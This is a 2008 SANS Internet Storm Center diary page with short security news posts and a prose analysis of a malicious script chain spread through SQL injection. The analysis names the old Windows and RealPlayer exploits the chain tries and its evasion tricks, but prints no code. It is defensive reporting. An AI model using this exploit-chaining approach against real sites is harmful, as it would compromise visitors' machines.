Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2008-03-07 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

US Daylight Saving Time starts this weekend

Published: 2008-03-07
Last Updated: 2008-03-08 15:41:14 UTC
by Jim Clausing (Version: 2)
0 comment(s)

Just a reminder this is the weekend that Daylight Savings Time starts in the US at 02:00 local time Sunday morning.  This is the time change where you lose an hour.  Hopefully most of you are using UTC/GMT for your servers, but if you are running them on local time, beware of cron jobs running at odd times. :)  By the way, those who think I should have taken tomorrow's shift as handler on duty so I could have a shorter shift, we run our shifts on UTC, so they are all 24 hours, every day of the year.

Keywords:
0 comment(s)

Microsoft Black Tuesday Advanced Notification

Published: 2008-03-07
Last Updated: 2008-03-08 00:04:06 UTC
by Jim Clausing (Version: 1)
0 comment(s)

It is that time of the month again.  Microsoft has announced that they plan to release 4 critical bulletins next Tuesday.  More info can be found at http://blogs.technet.com/msrc/archive/2008/03/06/march-2008-advance-notification.aspx.

Keywords:
0 comment(s)

Odds

Published: 2008-03-07
Last Updated: 2008-03-07 15:56:50 UTC
by Mark Hofman (Version: 1)
0 comment(s)

Some odds and sods

  • A security issue has been reported for Horde web mail (thanks Dariush)
  • A number of you would have noticed that a new version of Java is available
  • My vista box insisted on applying KB9401510 which "enables Vista to detect software that bypasses software activation and interferes with normal Windows operation"

Vista SP1

I installed SP1 on a Vista box about a week ago and so far things seem to be quite ok.  I must confess I've only seen a few changes on the system.  When the system goes into sleep mode, it actually starts up again without problems (well usually).  The file transfers on the machine itself are slightly faster.  No longer does it spend half the  day trying to calculate how much time it will take to transfer a 1MB file.  The other change I can see is on boot up.  It seems to give me the system slightly faster than it used to.  I still get the occasional BSOD and the networking just dies after suspending the system a few times, but that could be anything on my box.

Mark  - Shearwater

Keywords:
0 comment(s)

Fun with some code

Published: 2008-03-07
Last Updated: 2008-03-07 15:15:52 UTC
by Mark Hofman (Version: 1)
0 comment(s)

One of the things I love about being a handler, other than the red shirt, is that pretty much every day I learn something new.   Thanks to our readers and through cooperation with various groups around the planet we get to see some interesting stuff. 

Last week Jeremy sent a link and a few files for us to have a closer look at.  The link was being injected (using SQL Injection) into a site and if successful would have resulted in a world of pain for anyone visiting the compromised site afterwards.  After a quick check it was obvious that nasty things would happen, the final result was a file which had a detect rate of 2/32 on VT, other files had similar detect rates.  

When looking at malicious things there are a number of ways to look at it.  The code junkies will look at the code and analyse it, follow it through and throw debuggers at the final executable.  Net heads may execute (on a VM or sacrificial system) a file or visit a link and see where the packets take them.  I probably would have done the latter if a couple of hours previously I had not seriously trashed my playpen, looking at the code was my only option.  Glad I did.

The first script sets a cookie, it generates a random number used to select the exploit path to follow although only two paths are available.  Depending on the result it pulls in an iframe, either a html file or a js file.

Following the html stream , the next page also sets a cookie and attempts a number of exploits, MS06014, MS07004, MS06067, MS06057 Real player exploit or storm player exploit are the ones so far.   Each is attempted.  If the preceding exploit did not work the next exploit is attempted.  Once the final exploit is attempted a counter is set on a stats site.

The JS stream similarly also tries a number of vulnerabilities  including MS07-055, telnet, file transfer, file injection and a real player attack.   A number of vbscripts are used in this stream, reversed, possibly to try and evade scanning tools.  At the end of this stream another counter was set on a stats site.

There were a few interesting things in the scripts such as the setting of the cookies and the multiple attack streams.    Interestingly the exploits are all relatively old, but obviously still worth the effort.   The files that are eventually downloaded are typical downloaders grabbing additional files, but I’m still going through them.    There is still more to find. 

Only a few sites seem to have been compromised with this code, so far.  Attempts to shut down the hosting sites so far have not been successful.  I may be able to publish more info at a later date and provide some code samples. 

Cheers

Mark

Keywords:
0 comment(s)
Diary Archives